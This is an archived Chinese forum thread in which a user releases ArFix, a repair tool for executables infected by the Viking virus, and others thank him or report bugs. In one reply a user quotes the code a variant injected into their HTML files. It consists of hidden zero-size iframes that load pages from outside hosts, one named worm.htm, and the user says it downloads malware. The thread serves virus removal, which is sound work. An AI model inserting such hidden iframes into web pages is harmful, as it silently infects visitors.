绿色家园 » 『专杀工具』 » 可扩展的威金类病毒修复工具ArFix1.3.7.0118

2006-12-27 07:10 西门吹雪
可扩展的威金类病毒修复工具ArFix1.3.7.0118

[size=3][size=4][color=blue][b]目前这种捆绑式的EXE文件感染病毒,变种较多,非常讨厌!
写了个简单的工具,可以使朋友们自己进行查杀![/b][/color][/size]

[color=darkred][b]使用方法:[/b][/color]
[b][color=black]1、将ArFix.rar 下载到本地解压缩(请不要在压缩包中运行,不然特征库可能无法保存)[/color][/b][/size]
[size=3][b][color=black]
2、运行ArFix.exe [/color][/b][/size]
[size=3][b][color=black]
3、添加样本-〉选择一个 [color=red]病毒文件[/color] 或者 一个被病毒感染的文件(如某些图标有变化的文件,有时需要添加病毒母体才能杀干净)![/color][/b][/size]
[size=3][b][color=black]
4、显示 病毒可能是个正常文件时,说明这不是个被感染的程序,可能是病毒母体,这种无法修复,只能删除!([color=red]文件选择错误,会删除掉正常的程序[/color])

5、显示 为被感染的可执行程序时,说明这个被感染了,可以修复!

6、添加到特征库后,会看到 支持的变种数量 增加了!

7、进行查杀![color=red]发现第1个修复成功的EXE后,立即停止查杀,运行被修复的EXE,若修复后运行正常则可以进行全盘查杀,否则请不要继续使用本程序![/color]


[color=green][b]感谢 [/b][/color][/color]nfree pfox[/b] [/size][size=3][color=green][b]提供导致出错的EXE文件,修复了一个BUG!
感谢 [color=black]ndam[/color] 反馈重启后删不掉某些文件,修复了一个BUG!

[/b][/color][/size][size=3][b][color=black]

[/color][/b][/size]

2006-12-27 07:14 yyasong
哇,西门大哥好强啊,什么时候也教一下我们啊,能够转载吗

2006-12-27 07:15 西门吹雪
回复 #2 yyasong 的帖子

可以!不过我还没有全面测试!
你搞个样本测试下看能否杀干净!

2006-12-28 00:42 aiuhx
收藏一个备用
扫描了一下,我机器上没有威金

2006-12-28 02:40 qazyhn
试试

2006-12-28 17:49 asuradoll
在28号吧,我朋友传个东西给我,基于信任,我看也不看就运行了……(我从来都是“裸奔”的,杀毒软件装了也没运行)
随后就感觉不对劲,用peid查一下……程序入口很可疑,哎。后来去网上查了一下资料,才发现是中了大名鼎鼎的威金。
为时已晚。。。所有的PE文件全给捆绑了,郁闷得很。

后来用OD找到了原来的PE文件的入口,给脱了后把额外的数据删除,可是这样也不行哪。
找了老半天终于看到老兄你发布的东东了,真是唐僧保佑。。。把PE文件全修复好了。
太感谢您老人家了。。&_&

呼```还有呢,就是很是钦佩西门大哥的技术……
所以想讨教一下方法,希望西门大哥不吝赐教。!

小子QQ:234300935

谢谢!!

2006-12-28 23:17 西门吹雪
回复 #6 asuradoll 的帖子

欢迎交流学习!
[url]http://arswp.com/bbs/viewthread.php?tid=988&extra=page%3D1[/url]

2007-1-2 14:12 感谢
西门  我那个变种 把html文件都感染了  只要运行就从网上下cn911.exe


暂时只知道每个html文件里都被加了
<META c name=GENERATOR></HEAD>
<BODY bgColor=#ffffff leftMargin=0 text=#000000 topMargin=0 marginheight="0"
marginwidth="0">
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 height=255 width=400>
  <TBODY>
  <TR>
    <TD align=middle bgColor=#e6fff0 vAlign=center><IMG height=255
      src="load.gif" width=400></TD></TR></TBODY></TABLE></BODY></HTML>
  <iframe src=http://www.ac86.cn/88/index.htm width=0 height=0></iframe>
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>

[[i] 本帖最后由 感谢 于 2007-1-2 23:25 编辑 [/i]]

2007-1-3 02:38 zzwlsw
不清楚,自己有没有先下来再说

2007-1-4 02:49 344465742
LOGO_1文件找不到  但是一打开我的电脑就跳出LOGO_1的进程

2007-1-8 01:15 panwenjing
ff

rgf

2007-1-8 01:16 panwenjing
我为什么下不了啊?

2007-1-8 07:20 奶嘴
感谢啊啦,我的电脑没有中招.嘿嘿....:$

2007-1-8 07:44 pfox
西门,这个版本有没有去掉病毒写在文件尾部的部分?

2007-1-8 08:03 西门吹雪
回复 #14 pfox 的帖子

没有!
只是提高了一下容错性!

2007-1-8 13:41 canwen
wo yao

2007-1-9 09:37 lan5201
gggfdgfdgfd

2007-1-10 11:12 hotfish
:D :D 永远支持清理助手,十分的好用,谢谢你们的努力

2007-1-12 02:03 turkey2k6
不知道为啥,我在用此软件添加了我上传的那个logo_1.exe样本后,扫描电脑时,无任何提示自动退出,试了好几台电脑都是一样

2007-1-12 14:32 saab9981
同学中了,杀了10几个出来,呵呵……

他推荐我用,我还以为我电脑没必要杀呢,没想到也杀了两个出来,哈哈……

西门吹雪,强……

页: [1] 2 3 4
查看完整版本: 可扩展的威金类病毒修复工具ArFix1.3.7.0118

※※※※※※

Powered by Discuz! Archiver 5.5.0  © 2001-2006 Comsenz Inc.